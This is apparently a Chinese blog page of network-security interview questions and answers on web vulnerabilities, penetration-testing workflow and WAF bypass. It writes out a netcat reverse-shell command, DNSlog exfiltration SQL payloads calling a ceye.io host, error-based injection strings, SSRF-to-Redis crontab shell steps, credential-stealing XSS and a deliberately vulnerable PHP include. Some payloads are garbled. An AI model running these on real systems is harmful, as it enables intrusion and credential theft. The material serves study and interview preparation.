永川区网站建设,东莞十大保安公司,如何建设内网网站,施秉网站建设网络安全面试题目
Web安全
web白盒漏洞问题
1.JAVA反序列化了解吗#xff1f;有没有了解过shrio反序列化#xff1f;
Java中的ObjectOutputStream类的writeObject()方法可以实现序列化#xff0c;其作用把对象转换成字节流#xff0c;便于保存或者传输#xff0c;而Ob…网络安全面试题目
Web安全
web白盒漏洞问题
1.JAVA反序列化了解吗有没有了解过shrio反序列化
Java中的ObjectOutputStream类的writeObject()方法可以实现序列化其作用把对象转换成字节流便于保存或者传输而ObjectInputStream类的readObject()方法用于反序列化作用就是把字节流还原成对象。shiro反序列化主要是Apache shiro提供了一个remember的一个功能用户登录成功后会生成经过加密并编码的cookie保存在浏览器中方便用户的日常使用而服务器对cookie的处理流程就是先获取浏览器上保存的cookie然后将其bs64解码再进行AES解密再将其反序列化进行校验而漏洞就是出现在这里我们都知道AES它是一个硬编码他是有默认密钥的如果程序员没有去修改或者过于简单那我们就可以进行cookie重构先构造我们的恶意代码然后将恶意代码进行序列化然后AES加密(密钥我们已经爆破出来了)再进行bs64编码形成我们新的cookie而服务器在处理时就会按照刚才的处理流程就会在服务端触发我们构造的恶意代码。
2.PHP反序列化有了解吗
序列化就是将一个对象转换成字符串反序列化则反之将字符串重新转化为对象。此外PHP反序列化又可以简单分成两种一种无类一种有类无类利用就略微简单如果源码会将输入的值进行反序列化那我们就需要提前将数据序列化后再传入。而想要利用有类就要用到魔术方法而魔术方法就像一个潜规则一样例如我们在创建对象时就会触发 construct(),并执行 construct()中的代码。
3.fastjson漏洞利用原理
在请求包里面中发送恶意的json格式payload漏洞在处理json对象的时候没有对type字段进行过滤从而导致攻击者可以传入恶意的TemplatesImpl类而这个类有一个字段就是 _bytecodes 有部分函数会根据这个 _bytecodes 生成java实例这就达到fastjson通过字段传入一个类再通过这个类被生成时执行构造函数。
4.PHP代码执行的危险函数PHP命令执行函数 PHP 代码执行的危险函数call_user_func()、call_user_func_array()、create_function()、array_map() PHP 命令执行函数system()、shell_exec()、passthru()、exec()、popen()、proc_open()、putenv()
5.phar协议如何利用php伪协议input与post数据包发送有什么区别
可以Bypass一些waf绕过上传限制Phar反序列化Phar:// 伪协议读取phar文件时会反序列化meta-data储存区别 application/x-www-form-urlencoded 或multipart/form-data时php://input 中是原始数据。 $_POST 中是关联数组且没有上传控件的内容。enctype“multipart/form-data” 时php://input 是无效的。Content-Type text/plain时$_POST 不能获取post的数据php://input可以。
** Fastjson、Log4j常见漏洞原理如何彻底解决该漏洞
思路彻底解决该漏洞可以分析根因Fastjson主要因为Autotype导致的、Log4j主要因为Lookup可考虑移除经常出现问题的代码制作内部精简定制版本。或者通过应用运行时防护RASP。
web组件端口漏洞问题
1.常见的中间件漏洞知道哪些
IISPUT漏洞、短文件名猜解、远程代码执行、解析漏洞等Apache解析漏洞、目录遍历等Nginx:文件解析、目录遍历、CRLF注入、目录穿越等Tomcat:远程代码执行、war后门文件部署等JBoss:反序列化漏洞、war后门文件部署等WebLogic:反序列化漏洞、SSRF任意文件上传、war后门文件部署等
2.未授权访问你可以简单说说吗
Redis 未授权访问漏洞
未开启认证导致可以直接连接到数据库然后在攻击机中生成ssh公钥和私钥密码设置为空然后将生成的公钥写入再利用私钥连接。
JBOSS 未授权访问漏洞
访问ip/jmx-console 就可以浏览jboss 的部署管理的信息面板不需要输入用户名和密码可以直接部署上传木马。简单来说就是对某些页面的验证不严格导致绕过了用户验证的环节使其可以直接访问到某些登录后才能访问到的页面。
3.weblogic权限绕过
通过静态资源来绕过权限验证防止被重定向到登陆界面。通过请求.portal 控制处理的Servlet 是渲染UI 的MBeanUtilsInitSingleFileServlet 。通过编码后的…/ 让最终渲染的模版是console.portal。
web基础实战问题
1.逻辑漏洞遇到过哪些给你登录框有没有什么思路
常见逻辑漏洞越权响应包修改支付金额修改cookie爆破密码找回方面等等登录页面思路爆破session覆盖sql注入xss任意用户注册js文件查看敏感信息短信轰炸万能密码二次注入模板注入等等
2.CDN和DNS区别CDN绕过思路
CDN内容分发网络主要作用就是让用户就近访问网络资源提高响应速度降低网络拥堵。DNS:域名服务器主要作用就是将域名翻译成ip地址。CDN绕过思路子域名内部邮件黑暗引擎搜索国外ping证书及DNS查询app抓包配置不当泄露扫全网DOS攻击等。
3.命令无回显如何解决
无回显延时判断http请求监听DNSlog利用写入当前目录下载查看等等。
4.3389端口无法连接的几种情况
1.3389关闭状态
2.端口修改
3.防火墙连接
4.处于内网环境
5.超过了服务器最大连接数
6.管理员设置 权限指定用户登录
5.常问的端口信息
21FTP文件传输协议22SSH远程连接23:TELNET远程登录25:SMTP邮件服务53:DNS域名系统80HTTP超文本传输协议443HTTPS安全超文本传输协议1433MSSQL3306MYSQL3389windows远程桌面服务端口7701weblogic8080TCP,HTTP协议代理服务器Apache-tomcat默认端口号
6.渗透测试的流程
单一网站先判断有无CDN有先找真实ip无的话扫扫旁站c段此外识别CMS看看使用什么中间件插件系统等等再对其进行端口探测目录扫描查看网站的js文件看看有没有敏感信息泄露找找看看有没有app公众号之类的等等扩大资产面然后对收集到的信息进行常规的漏洞探测网段或区域使用goby工具对资产进行一个批量的扫描批量打点然后对可能存在漏洞的薄弱点进行漏洞探测
7.打点一般会用什么漏洞
优先以java反序列化这些漏洞像shirofastjsonweblogic用友oa等等进行打点随后再找其他脆弱性易打进去的点。因为javaweb程序运行都是以高权限有限运行部分可能会降权。
8.SSRF禁用127.0.0.1后如何绕过支持哪些协议
(1) 利用进制转换
(2) 利用DNS解析
(3) 利用句号127。0。0。1
(4) 利用[::]http://[::]:80/
(5) 利用http /example.com127.0.0.1
(6) 利用短地址http /dwz.cn/11SMa
(7) 协议Dict://、SFTP://、TFTP://、LDAP://、Gopher://
9.sqlmap自带脚本你知道哪些
1、apostrophemask.py 将引号替换为UTF-8,用于过滤单引号。
2、base64encode.py :替换为base64编码。
3、multiplespaces.py:围绕SQL关键字添加多个空格。
4、space2plus.py:用号替换为空格。
10.了解过解析漏洞分别有哪些
IIS 1、在网站目录.asp、.asa下的任何扩展名的文件格式都会被解析为asp并执行在目录.asp下.txt文本文件被解析。2、在IIS6.0上分号; 后面的不解析。 nginx 1、在网站目录下创建文件demo2.jpg然后再浏览器 中 访 问 http://192.168.11.131/test2/demo2.jpg/aaa.php服务器对请求的内容是从右向左的。Nginx拿到文件路径更专业的说法是URI/test.jpg/test.php后一看后缀是.php便认为该文件是php文件转交给php去处理。php一看/test.jpg/test.php不存在便删去最后的/test.php又看/test.jpg存在便把/test.jpg当成要执行的文件了又因为后缀为.jpgphp认为这不是php文件于是返回“Accessdenied.”。2、00截断 apache Apache解析文件的时候是按照从右向左的方式直到遇到自己能解析的脚本后缀
11.为何一个mysql数据库的站只有一个80端口开放
更改了端口没有扫描出来。站库分离。3306端口不对外开放。
12.注入时可以不使用and或or或xor直接order by开始注入吗
and/or/xor前面的11、12步骤只是为了判断是否为注入点如果已经确定是注入点那就可以省那步骤去。
13.在有shell的情况下如何使用xss实现对目标站的长久控制
后台登录处加一段记录登录账号密码的js并且判断是否登录成功如果登录成功就把账号密码记录到一个生僻的路径的文件中或者直接发到自己的网站文件中。(此方法适合有价值并且需要深入控制权限的网络)。在登录后才可以访问的文件中插入XSS脚本。
14.目标站无防护上传图片可以正常访问上传脚本格式访问则403什么原因
这种情况很可能是因为目标站点对上传文件进行了格式限制。在上传文件时服务器通常会检测文件类型和内容并根据不同的文件类型采取不同的处理方式。如果上传的文件类型不在允许范围内服务器可能会禁止访问该文件返回403状态码。可以尝试改写后缀进行绕过。
15.access扫出后缀为asp的数据库文件访问乱码。如何实现到本地利用
迅雷下载直接改后缀为.mdb。
16.文件包含Getshell思路
通过PHP伪协议php://input写入一句话木马通过PHP伪协议php://filter读取敏感文件
17.xss的防护方法有哪些呢httponly绕过
防护 输入过滤纯前端渲染转义HTML 绕过 CVE-2012-0053。PHPINFO页面如果目标网站存在PHPINFO页面就可以通过XMLHttpRequest请求该页面获取Cookie信息$_SERVER[“HTTP_COOKIE”]会打印出具有httponly属性的cookies。iframe框架钓鱼通过标签嵌入一个远程域完全撑开后以覆盖原有的页面。跳转钓鱼通过购买相似名构建相同的钓鱼页面使受害者跳转至钓鱼站。历史密码通过js伪造登录表单欺骗浏览器自动填入由此获取浏览器记住的历史密码。
18.你常用的渗透工具or漏扫工具
渗透工具msfcsnmapslqmapdirscanburp等漏扫xray,awvs,nessus,appscan等
19.sqlmap中–os-shell的原理及利用条件
利用条件root权限知道绝对路径GPC关闭Secure_file_priv参数为空或者为指定路径。原理及流程原理其他比较简单先目标的一个基础信息的探测然后上传shell到目标web网站上利用shell传参进行命令执行退出时删除shell。当然数据库不同必要条件也不同例如sqlserver需要数据库支持外连数据库权限为SA权限主要利用xp_cmdshell扩展进行命令执行。原理细致分析https://xz.aliyun.com/t/7942#toc-4
20.对于信息收集你会使用哪些工具具体用来干什么
nmap端口服务扫描常见漏洞探测dirsearch目录信息扫描whatwafwaf检测识别WFuzzfuzz测试潮汐指纹识别orwappalzercms及中间件等信息收集
21.市面上的几款webshell管理工具他们的相同点和不同点
相同点都是webshell管理的工具都采用的是C/S模型上传的shell为S个人客户端为C。不同点实现区别功能差异例如冰蝎有流量动态加密。
22.nmap常用参数说一下
参考文章https://www.cnblogs.com/Vinson404/p/7784829.htm
23.如何手工判断对方操作系统
修改url中参数改成大写正常为windows不正常即为linuxping服务器返还得TTL值不一样windows一般在100以上linux一般是100以下。查看数据包HTTP报头如果是iis那就肯定是windows
24.Linux日志目录
/var/log下
25.php的%00截断的原理是什么
因为在C语言中字符串的结束标识符%00是结束符号而PHP就是C写的所以继承了C的特性所以判断为%00是结束符号不会继续往后执行条件PHP5.3.29且GPC关闭。
26.php的LFI本地包含漏洞原理是什么写一段带有漏洞的代码。手工的话如何发掘如果无报错回显你是怎么遍历文件的
if ($_GET[file]){include $_GET[file];
}包含的文件设置为变量并且无过滤导致可以调用恶意文件 还可以对远程文件包含但需要开启allow_url_include ON 通过测试参数的地方进行本地文件/etc/passwd等包含 如何存在漏洞而且没有回显有可能没有显示在页面而是在网页源代码中除些可以利用DNSlog进行获取包含的信息。从index.php文件一级级往读取 也可以利用PHP封装协议读取文件
27.sleep被禁用后还能怎么进行sql注入
BENCHMARKGet_lock函数当都被禁用后可以用计算量比较大的语句使数据库查询时间变长从而达到延时注入的效果。 mysqlAND (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.SCHEMATA C);
28.XXE的危害哪些地方容易存在xxexxe架构方面有没有了解过
xxe常见场景是如pdf在线解析、word在线解析、定制协议留言板等跟逻辑设计有关而与语言无关最好是不要让XML作为参数传输或整体结构可被用户篡改。如果一定要使用至少要禁用DTD、Entity。 xxe危害 读取本地文件执行系统命令探测内网端口攻击内网服务 探测内网端口的协议有gopher file dict不同语言支持不同的协议是具体情况而定 file http ftp是常用的防范python用lxml时可以对resolve_entities设为false。或者过滤用户提交的xml客户端也可以有xxe攻击有的网站会使用office打开docx进行解析 Java解析XML的常用三方库如果不禁用DTD、Entity都会导致XXE漏洞javax.xml.stream.XMLStreamReader;javax.xml.parsers.DocumentBuilderFactory;
29.信息收集如何处理子域名爆破的泛解析问题
参考文章https://blog.csdn.net/Chu_Jian_Xiong/article/details/127496889
30.输出到href的XSS如何防御
参考文章https://blog.csdn.net/m0_53008479/article/details/124487401
31.samesite防御CSRF的原理
参考文章https://blog.csdn.net/qq_26192391/article/details/116378150
32.phpmyadmin写sehll的方法
常规导入shell的操作一句话导出shell日志备份获取shell
33.Sql注入无回显的情况下利用DNSlogmysql下利用什么构造代码mssql下又如何
没有回显的情况下一般编写脚本进行自动化注入。但与此同时由于防火墙的存在容易被封禁IP可以尝试调整请求频率有条件的使用代理池进行请求。此时也可以使用DNSlog 注入原理就是把服务器返回的结果放在域名中然后读取DNS 解析时的日志来获取想要的信息。Mysql 中利用load_file() 构造payload ’ and if((select load_file(concat(‘\’,(selectdatabase()),‘.xxx.cey e.io\abc’))),1,0)#Mssql 下利用master…xp_dirtree 构造payloadDECLARE hostvarchar(1024);SELECT host(SELECTdb_name())‘.xxx.ceye.io’;EXEC(‘master…xp_dirtree’host‘\foobar$’);
34.宽字节注入漏洞原理、利用方式及修复方案 原理在mysql中使用了gbk编码占用2个字节,而mysql的一种特性,GBK是多字节编码它认为两个字节就代表一个汉字所以%df时候会和转义符\ %5c进行结合,所以单引号就逃逸了出来,当第一个字节的ascii码大于128就可以了。 参考文章 https://blog.csdn.net/weixin_41489908/article/details/108481665 https://www.cnblogs.com/zzjdbk/p/12984498.html
35.平常怎么去发现shiro漏洞的
思路登陆失败时候会返回rememberMedeleteMe字段或者使用shiroScan被动扫描去发现完整未登陆的情况下请求包的cookie中没有rememberMe字段返回包setCookie里也没有deleteMe字段登陆失败的话不管勾选RememberMe字段没有返回包都会有rememberMedeleteMe字段不勾选RememberMe字段登陆成功的话返回包set-Cookie会有rememberMedeleteMe字段。但是之后的所有请求中Cookie都不会有rememberMe字段勾选RememberMe字段登陆成功的话返回包set-Cookie会有rememberMedeleteMe字段还会有rememberMe字段之后的所有请求中Cookie都会有rememberMe字段。
36.拿到webshell不出网情况下怎么办
reg上传去正向连接。探测出网协议如dnsicmp。
37.phpmyadmin写sehll的方法
常规导入shell的操作一句话导出shell日志备份获取shell
38.ssrf怎么用redis写shell
SSRF服务端请求伪造 对内网扫描获取banner攻击运行在内网的应用主要是使用GET参数就可以实现的攻击比如Struts2sqli 等。利用协议读取本地文件。云计算环境AWS Google Cloud 环境可以调用内网操作ECS 的 API。 webligic SSRF漏洞通过SSRF的gopher协议操作内网的redis利用redis将反弹shell写入crontab定时任务url编码将\r字符串替换成%0d%0a。
39.SVN/GIT源代码泄露
SVN原理 在使用SVN管理本地代码过程中会自动生成一个名为.svn的隐藏文件夹其中包含重要的源代码信息SVN修复方式 查找服务器上所有 .svn 隐藏文件夹删除。开发人员在使用 SVN 时严格使用导出功能。禁止直接复制代码。GIT原理 使用git进行版本控制对站点自动部署。如果配置不当可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。GIT修复方式 查找服务器上所有 .git 隐藏文件夹删除。中间件上设置 .git 目录访问权限禁止访问。
40.提权你了解过吗udf提取原理是什么
将udf文件放到指定位置Mysql5.1放在Mysql根目录的lib\plugin文件夹下从udf文件中引入自定义函数(user defined function)执行自定义函数完整MySQL和PostgreSQL等数据库软件中允许用户自定义函数并使用这些自定义函数进行查询。由于UDF函数可以动态加载这就为攻击者提供了一种途径即将恶意代码编写成UDF形式并上传到数据库然后通过SQL注入等手段触发该函数从而获得系统管理员权限。
41.反弹 shell 的常用命令一般常反弹哪一种 shell为什么
nc -lvvp 7777 -e /bin/bashbash是交互式,否则像useradd无法执行交互
42.如何手工判断对方操作系统
修改url中参数改成大写正常为windows不正常即为linuxping服务器返还得TTL值不一样windows一般在100以上linux一般是100以下。查看数据包HTTP报头如果是iis那就肯定是windows
43.DDos攻击
客户端向服务端发送请求链接数据包服务端向客户端发送确认数据包客户端不向服务端发送确认数据包服务器一直等待来自客户端的确认
没有彻底根治的办法除非不使用TCP
DDos预防
1限制同时打开SYN半链接的数目
2缩短SYN半链接的Time out 时间
3关闭不必要的服务
44.找到一个注入点怎么判断对方什么数据库
常见的数据库Oracle、MySQL、SQL Server、Access、MSsql、mongodb等 关系型数据库由二维表及其之间的联系组成的一个数据组织。如Oracle、DB2、MySql
可以使用特定的函数来判断该数据库特有的。 len()函数mssql、mysql、db2length()函数:Oracle、informixsubstringmssqlsubstroracleversion()1 返回与version1 相同页面时则可能是mysql。如果出现提示version()错误时则可能是mssql。 可以使用辅助的符号来判断如注释符号、多语句查询符等等。 /* mysql特有注释符返回错误说明不是mysql– 是Oracle和MSSQL支持的注释符如果返回正常则说明为这两种数据库类型之一。继续提交如下查询字符; 是子句查询标识符Oracle不支持多行查询因此如果返回错误则说明很可能是Oracle数据库。 可以利用错误信息 错误信息中包含了MySQL和server version等关键词这表明该目标系统可能是MySQL数据库。错误信息中包含了quotation mark等关键词这表明该目标系统可能是MSSQL数据库。错误信息中包含了Syntax error等关键词这表明该目标系统可能是ACCESS数据库 是否存在数据库某些特性辅助判断 and exists (select count(*) from sysobjects) 返回正常是mssqland exists (select count(*) from msysobjects) 两条和上一条返回都不正常是ACCESS如果是字符型参数后加 ’ 最后加 ;–
45.报错注入的函数有哪些10个
1and extractvalue(1, concat(0x7e,(select version),0x7e))
2通过floor报错 向下取整
3and updatexml(1, concat(0x7e,(secect version),0x7e),1)
4select from test where id1 and geometrycollection((select from(selectfrom(select user())a)b));
5select from test where id1 and multipoint((select from(select from(select user())a)b));
6select from test where id1 and polygon((select from(select from(select user())a)b));
7select from test where id1 and multipolygon((select from(select from(select user())a)b));
8select from test where id1 and linestring((select from(select from(select user())a)b));
9select from test where id1 and multilinestring((select from(select from(select user())a)b));
10select from test where id1 and exp(~(select * from(select user())a));
46.为什么参数化查询可以防止sql注入
使用参数化查询数据库服务器不会把参数的内容当作sql指令的一部分来执行是在数据库完成sql指令的编译后才套用参数运行
简单的说: 参数化能防注入的原因在于,语句是语句参数是参数参数的值并不是语句的一部分数据库只按语句的语义跑
47.SQL注入单引号被过滤怎么办
采用URL编码进行绕过 ’ -- %27
48.SQL注入逗号被过滤了怎么办
存在联合注入用join代替逗号存在盲注使用substring函数和ascii函数
49.Mysql一个和两个什么区别
一个是用户自定义变量 两个是系统变量如version、user
50.json格式的CSRF如何防御?
启用CSRF令牌
{ “name”: “John”, “age”: 30, “csrf_token”: “random_string_here” }
使用SameSite Cookie 具体实现方式可以在每个JSON请求中添加一个带有SameSite属性的Cookie如下所示。 Cookie: session_idrandom_string_here; SameSiteStrict
51.过滤limit后的逗号如何绕过?
采用OFFSET参数 SELECT * FROM tb_brand LIMIT 2 OFFSET 1 -- 从1开始取两条数据
52.在渗透过程中收集目标站注册人邮箱对我们有什么价值
(1)丢社工库里看看有没有泄露密码然后尝试用泄露的密码进行登录后台
(2)用邮箱做关键词进行丢进搜索引擎
(3)利用搜索到的关联信息找出其他邮箱进而得到常用社交账号
(4)社工找出社交账号里面或许会找出管理员设置密码的习惯
(5)利用已有信息生成专用字典
(6)观察管理员常逛哪些非大众性网站拿下它你会得到更多好东西
53.目前已知哪些版本的容器有解析漏洞具体举例
1、IIS 6.0
/xx.asp/xx.jpg xx.asp是文件夹名
2、IIS 7.0/7.5
默认 Fast-CGI 开启直接在 url 中图片地址后面输入/1.php会把正常图片当成 php 解析
3、Nginx
版本小于等于 0.8.37利用方法和 IIS 7.0/7.5 一样Fast-CGI 关闭情况下也可利用。空字节代码
xxx.jpg.php
4、Apache
上传的文件命名为test.php.x1.x2.x3Apache 是从右往左判断后缀
54.如何突破注入时字符被转义**
宽字符注入hex 编码绕过
55.提权时选择可读写目录为何尽量不用带空格的目录
因为 exp 执行多半需要空格界定参数
web bypass waf问题
1.WAF绕过的手法你知道哪些
这里从以sql注入为例从三个层面简单总结一下手法。
1.从架构层面找到服务器真实IP同网段绕过http和https同时开放服务绕过边缘资产漏洞利用绕过。
2.从协议层面分块延时传输利用pipline绕过利用协议未覆盖绕过POST及GET提交绕过。
3.从规则层面编码绕过等价符号替换绕过普通注释和内敛注释缓冲区溢出mysql黑魔法白名单及静态资源绕过文件格式绕过参数污染。
2.文件上传绕过WAF思路
参考文章https://cloud.tencent.com/developer/beta/article/1944142
